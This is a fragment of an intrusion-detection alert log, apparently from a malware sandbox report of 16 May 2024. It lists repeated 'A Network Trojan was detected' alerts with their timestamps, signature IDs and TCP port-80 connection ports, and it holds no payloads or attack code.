                  Source Port:49757
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:39.020338
                  SID:2025381
                  Source Port:49736
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:28.951650
                  SID:2021641
                  Source Port:49763
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:11.067189
                  SID:2021641
                  Source Port:49722
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:21.430034
                  SID:2025381
                  Source Port:49759
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:30.894418
                  SID:2825766
                  Source Port:49764
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:52.383820
                  SID:2021641
                  Source Port:49704
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:18.705946
                  SID:2021641
                  Source Port:49726
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:25.750611
                  SID:2021641
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:39.532388
                  SID:2025483
                  Source Port:80
                  Destination Port:49736
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:05.694542
                  SID:2025483
                  Source Port:80
                  Destination Port:49750
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:13.256185
                  SID:2025483
                  Source Port:80
                  Destination Port:49755
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:37.130221
                  SID:2021641
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:43.623424
                  SID:2024318
                  Source Port:49738
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:53.120055
                  SID:2024313
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:53.898131
                  SID:2024318
                  Source Port:49775
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:53.898131
                  SID:2024313
                  Source Port:49775
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:43.623424
                  SID:2024313
                  Source Port:49738
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:59.470457
                  SID:2024313
                  Source Port:49747
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:47.548431
                  SID:2025483
                  Source Port:80
                  Destination Port:49772
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:41.388891
                  SID:2024318
                  Source Port:49769
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:02.627302
                  SID:2825766
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:08.955748
                  SID:2025381
                  Source Port:49752
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:10.859696
                  SID:2024313
                  Source Port:49753
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:05.193094
                  SID:2024313
                  Source Port:49750
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:12.750490
                  SID:2025381
                  Source Port:49755
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:53.120055
                  SID:2024318
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:41.388891
                  SID:2024313
                  Source Port:49769
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:09.170149
                  SID:2825766
                  Source Port:49713
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:59.470457
                  SID:2024318
                  Source Port:49747
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:20.039736
                  SID:2025483
                  Source Port:80
                  Destination Port:49758
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:03.239293
                  SID:2025381
                  Source Port:49749
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:56.970973
                  SID:2825766
                  Source Port:49707
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:10.859696
                  SID:2024318
                  Source Port:49753
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:25.211849
                  SID:2025381
                  Source Port:49761
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:33.823352
                  SID:2025483
                  Source Port:80
                  Destination Port:49733
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:57.099162
                  SID:2025381
                  Source Port:49746
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:31.431993
                  SID:2021641
                  Source Port:49732
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:05.193094
                  SID:2024318
                  Source Port:49750
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:52.383820
                  SID:2825766
                  Source Port:49704
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:09.170149
                  SID:2021641
                  Source Port:49713
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:58.862053
                  SID:2025381
                  Source Port:49708
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:01.356159
                  SID:2021641
                  Source Port:49748
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:56.970973
                  SID:2021641
                  Source Port:49707
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:16.803035
                  SID:2024313
                  Source Port:49725
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:35.693093
                  SID:2024313
                  Source Port:49766
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:18.705946
                  SID:2825766
                  Source Port:49726
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:29.556038
                  SID:2024318
                  Source Port:49731
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:29.556038
                  SID:2024313
                  Source Port:49731
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:37.577907
                  SID:2825766
                  Source Port:49767
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:47.045718
                  SID:2024313
                  Source Port:49772
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:35.693093
                  SID:2024318
                  Source Port:49766
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:39.485062
                  SID:2025381
                  Source Port:49768
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:16.803035
                  SID:2024318
                  Source Port:49725
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:47.045718
                  SID:2024318
                  Source Port:49772
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:20.628600
                  SID:2025381
                  Source Port:49727
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:31.431993
                  SID:2825766
                  Source Port:49732
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:52.000180
                  SID:2025381
                  Source Port:49774
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:33.315004
                  SID:2025381
                  Source Port:49733
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:23.333175
                  SID:2021641
                  Source Port:49760
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:50.123310
                  SID:2825766
                  Source Port:49773
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:59.470457
                  SID:2025381
                  Source Port:49747
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:19.541569
                  SID:2021641
                  Source Port:49758
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:25.211849
                  SID:2021641
                  Source Port:49761
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:17.603710
                  SID:2825766
                  Source Port:49757
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:31.431993
                  SID:2025381
                  Source Port:49732
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:55.590961
                  SID:2025483
                  Source Port:80
                  Destination Port:49706
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:51.232610
                  SID:2021641
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:59.369699
                  SID:2025483
                  Source Port:80
                  Destination Port:49708
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:57.099162
                  SID:2024318
                  Source Port:49746
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:05.193094
                  SID:2025381
                  Source Port:49750
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:53.898131
                  SID:2825766
                  Source Port:49775
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:49.343817
                  SID:2825766
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:57.099162
                  SID:2024313
                  Source Port:49746
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:30.894418
                  SID:2024318
                  Source Port:49764
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:53.898131
                  SID:2025381
                  Source Port:49775
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:45.530428
                  SID:2825766
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:03.750636
                  SID:2025483
                  Source Port:80
                  Destination Port:49749
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:51.736667
                  SID:2025483
                  Source Port:80
                  Destination Port:49743
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:55.510827
                  SID:2025483
                  Source Port:80
                  Destination Port:49745
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:59.975323
                  SID:2025483
                  Source Port:80
                  Destination Port:49747
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:30.894418
                  SID:2024313
                  Source Port:49764
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:23.333175
                  SID:2825766
                  Source Port:49760
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:02.627302
                  SID:2021641
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:23.333175
                  SID:2025381
                  Source Port:49760
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:14.907253
                  SID:2825766
                  Source Port:49724
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:52.000180
                  SID:2024318
                  Source Port:49774
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:33.315004
                  SID:2021641
                  Source Port:49733
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:52.000180
                  SID:2024313
                  Source Port:49774
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:33.811515
                  SID:2825766
                  Source Port:49765
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:23.884685
                  SID:2024313
                  Source Port:49728
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:23.884685
                  SID:2024318
                  Source Port:49728
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:59.470457
                  SID:2825766
                  Source Port:49747
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:15.699411
                  SID:2024318
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:55.076784
                  SID:2825766
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:05.048280
                  SID:2025483
                  Source Port:80
                  Destination Port:49711
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:25.750611
                  SID:2025381
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:25.750611
                  SID:2825766
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:15.699411
                  SID:2024313
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:49.343817
                  SID:2025381
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:08.955748
                  SID:2825766
                  Source Port:49752
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:07.071740
                  SID:2021641
                  Source Port:49751
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:39.485062
                  SID:2021641
                  Source Port:49768
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:43.272420
                  SID:2825766
                  Source Port:49770
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:14.907253
                  SID:2025381
                  Source Port:49724
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:33.811515
                  SID:2025381
                  Source Port:49765
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:07.254938
                  SID:2025381
                  Source Port:49712
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:09.462527
                  SID:2025483
                  Source Port:80
                  Destination Port:49752
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:50.123310
                  SID:2025381
                  Source Port:49773
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:43.272420
                  SID:2025381
                  Source Port:49770
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:18.705946
                  SID:2024313
                  Source Port:49726
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:35.696425
                  SID:2025483
                  Source Port:80
                  Destination Port:49734
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:37.577907
                  SID:2025381
                  Source Port:49767
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:45.647664
                  SID:2025483
                  Source Port:80
                  Destination Port:49771
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:54.389626
                  SID:2025483
                  Source Port:80
                  Destination Port:49775
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:43.623424
                  SID:2021641
                  Source Port:49738
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:45.530428
                  SID:2025381
                  Source Port:49739
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:04.537805
                  SID:2024318
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:09.676041
                  SID:2025483
                  Source Port:80
                  Destination Port:49713
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:54.264582
                  SID:2024317
                  Source Port:49705
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:10.859696
                  SID:2021641
                  Source Port:49753
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:04.537805
                  SID:2024313
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:28.165565
                  SID:2025483
                  Source Port:80
                  Destination Port:49730
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:54.264582
                  SID:2024312
                  Source Port:49705
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:16.216451
                  SID:2025483
                  Source Port:80
                  Destination Port:49756
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:11.067189
                  SID:2825766
                  Source Port:49722
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:44.125784
                  SID:2025483
                  Source Port:80
                  Destination Port:49738
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:12.990169
                  SID:2021641
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:18.705946
                  SID:2024318
                  Source Port:49726
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:41.744488
                  SID:2025381
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:05.193094
                  SID:2825766
                  Source Port:49750
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:09.170149
                  SID:2024313
                  Source Port:49713
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:20.628600
                  SID:2825766
                  Source Port:49727
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:53.120055
                  SID:2825766
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:35.199755
                  SID:2025381
                  Source Port:49734
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:01.356159
                  SID:2024313
                  Source Port:49748
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:16.803035
                  SID:2021641
                  Source Port:49725
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:47.452852
                  SID:2025381
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:21.430034
                  SID:2024318
                  Source Port:49759
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:29.556038
                  SID:2021641
                  Source Port:49731
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:21.430034
                  SID:2024313
                  Source Port:49759
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:35.693093
                  SID:2021641
                  Source Port:49766
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:52.383820
                  SID:2025381
                  Source Port:49704
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:12.750490
                  SID:2825766
                  Source Port:49755
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:55.010656
                  SID:2025381
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:27.085627
                  SID:2025381
                  Source Port:49762
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:09.170149
                  SID:2024318
                  Source Port:49713
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:01.356159
                  SID:2024318
                  Source Port:49748
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:00.746100
                  SID:2025381
                  Source Port:49709
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:03.239293
                  SID:2825766
                  Source Port:49749
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:19.541569
                  SID:2024318
                  Source Port:49758
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:23.839877
                  SID:2025483
                  Source Port:80
                  Destination Port:49760
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:27.575264
                  SID:2025483
                  Source Port:80
                  Destination Port:49762
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:53.120055
                  SID:2025381
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:12.750490
                  SID:2021641
                  Source Port:49755
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:41.388891
                  SID:2825766
                  Source Port:49769
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:26.257152
                  SID:2025483
                  Source Port:80
                  Destination Port:49729
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:19.223879
                  SID:2025483
                  Source Port:80
                  Destination Port:49726
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:37.577907
                  SID:2024313
                  Source Port:49767
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:47.045718
                  SID:2825766
                  Source Port:49772
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:00.746100
                  SID:2021641
                  Source Port:49709
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:10.859696
                  SID:2025381
                  Source Port:49753
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:25.211849
                  SID:2024313
                  Source Port:49761
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:37.130221
                  SID:2025381
                  Source Port:49735
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:13.504816
                  SID:2025483
                  Source Port:80
                  Destination Port:49723
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:15.418885
                  SID:2025483
                  Source Port:80
                  Destination Port:49724
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:08.955748
                  SID:2024313
                  Source Port:49752
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:25.211849
                  SID:2024318
                  Source Port:49761
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:04.537805
                  SID:2825766
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:47.452852
                  SID:2021641
                  Source Port:49740
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:34.303762
                  SID:2025483
                  Source Port:80
                  Destination Port:49765
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:07.254938
                  SID:2021641
                  Source Port:49712
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:36:56.970973
                  SID:2025381
                  Source Port:49707
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:08.955748
                  SID:2024318
                  Source Port:49752
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:41.744488
                  SID:2021641
                  Source Port:49737
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:18.705946
                  SID:2025381
                  Source Port:49726
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:38.095021
                  SID:2025483
                  Source Port:80
                  Destination Port:49767
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:39.999092
                  SID:2025483
                  Source Port:80
                  Destination Port:49768
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:43.272420
                  SID:2024318
                  Source Port:49770
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:37.577907
                  SID:2024318
                  Source Port:49767
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:43.272420
                  SID:2024313
                  Source Port:49770
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:37:57.099162
                  SID:2021641
                  Source Port:49746
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:03.239293
                  SID:2024318
                  Source Port:49749
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:19.541569
                  SID:2024313
                  Source Port:49758
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:41.388891
                  SID:2025381
                  Source Port:49769
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/16/24-00:38:03.239293
                  SID:2024313
                  Source Port:49749
